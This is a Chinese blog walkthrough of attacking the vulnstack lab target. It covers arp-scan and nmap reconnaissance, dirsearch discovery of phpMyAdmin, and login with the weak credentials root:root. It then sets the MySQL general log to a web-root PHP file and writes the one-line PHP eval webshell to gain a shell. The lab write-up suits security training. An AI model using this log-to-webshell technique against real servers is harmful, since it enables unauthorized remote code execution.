🏘️个人主页: 点燃银河尽头的篝火(●’◡’●)
如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦
【红日安全】vulnstack (一)
- 靶场搭建
- 靶场渗透
- 明确目标
- 信息收集
- phpadmin后台getshell
靶场搭建
靶场下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
下载解压后在VM中打开
靶场渗透
明确目标
目标跟我们处于同一个网段
信息收集
先查一下我们自己的IP,用 ifconfig 查看攻击机的IP为192.168.64.131
探测一下跟我们同一网段下的主机有哪些,用Kali自带的arp扫描器扫描同一网段下的主机,发现了同一网段下的不同IP192.168.64.134,判断它就是要渗透的主机。
arp-scan -l 扫描网段所有主机
arp-scan -I eth0 -l 扫描指定网段所有IP

扫到IP之后接下来扫描端口,发现它开启了80、3306端口
nmap -T4 -p- 192.168.64.134

访问一下80端口,发现是phpStudy探针界面,在其中发现了它的操作系统是Windows,服务器是Apache

用dirsearch扫一下看看能发现什么,成功扫出来了phpmyadmin界面

访问一下看看,发现是一个登陆界面

用弱口令试试,刚开始试了admin:123456提示错误,又用root试了一下成功登录进去
账号:root
密码:root

phpadmin后台getshell
- 开启日志
set global general_log='on';

- 改变日志存储位置
set global general_log_file ="c:/phpStudy/www/she.php";

- 写入一句话木马
select '<?php @eval($_POST[cmd]);?>';

- 用蚁剑连接,成功getshell
